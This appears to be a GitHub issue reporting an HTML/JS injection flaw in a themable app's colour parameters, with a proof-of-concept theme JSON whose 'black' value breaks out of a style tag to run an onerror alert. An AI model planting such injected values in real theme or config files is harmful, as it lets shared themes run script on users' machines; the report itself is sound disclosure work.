This repository was archived by the owner on Oct 22, 2021. It is now read-only.
This repository was archived by the owner on Oct 22, 2021. It is now read-only.
HTML/JS Injection in color variable #649
Description
Technical information
Using version:
-
master(running from GitHub-published source code, currentlyv3.0.0-pre) -
latest(latest release, currentlyv2.2.2) -
vX.X.X(specify other version)
Running on:
- Linux
- Windows
- macOS
How comfortable you are with your system and/or IT in general:
- I'm kind of lost, honestly
- I know what's up, I could help you run some commands or checks
- My machine is fully under my control, tell me what you need
- I attended Defcon last year (Not really Defcon, but similar)
Problem
Color parameters are not properly filtered, and thus allow custom Html and js to be injected using a custom theme with a malformed color parameter
Proof Of Concept:
{
"colors": {
"r": 170,
"g": 207,
"b": 209,
"black": "#000000</style><img src=\"\" onerror=\"alert('XSS')\"></img><style class=\"theming\"> :root{ --color_black: #000000" ,
"light_black": "#05080d",
"grey": "#262828"
},
"cssvars": {
"font_main": "United Sans Medium",
"font_main_light": "United Sans Light"
},
"terminal": {
"fontFamily": "Fira Mono",
"cursorStyle": "block",
"foreground": "#aacfd1",
"background": "#05080d",
"cursor": "#aacfd1",
"cursorAccent": "#aacfd1",
"selection": "rgba(170,207,209,0.3)"
},
"globe": {
"base": "#000000",
"marker": "#aacfd1",
"pin": "#aacfd1",
"satellite": "#aacfd1"
}
}Ps.
It would be nice to have a proper way inject custom HTML and JS to the app so that we could add some custom widgets and functionality to our themes. To make this secure, maybe have the custom code be disabled unless user specifically allows "unsafe" theme options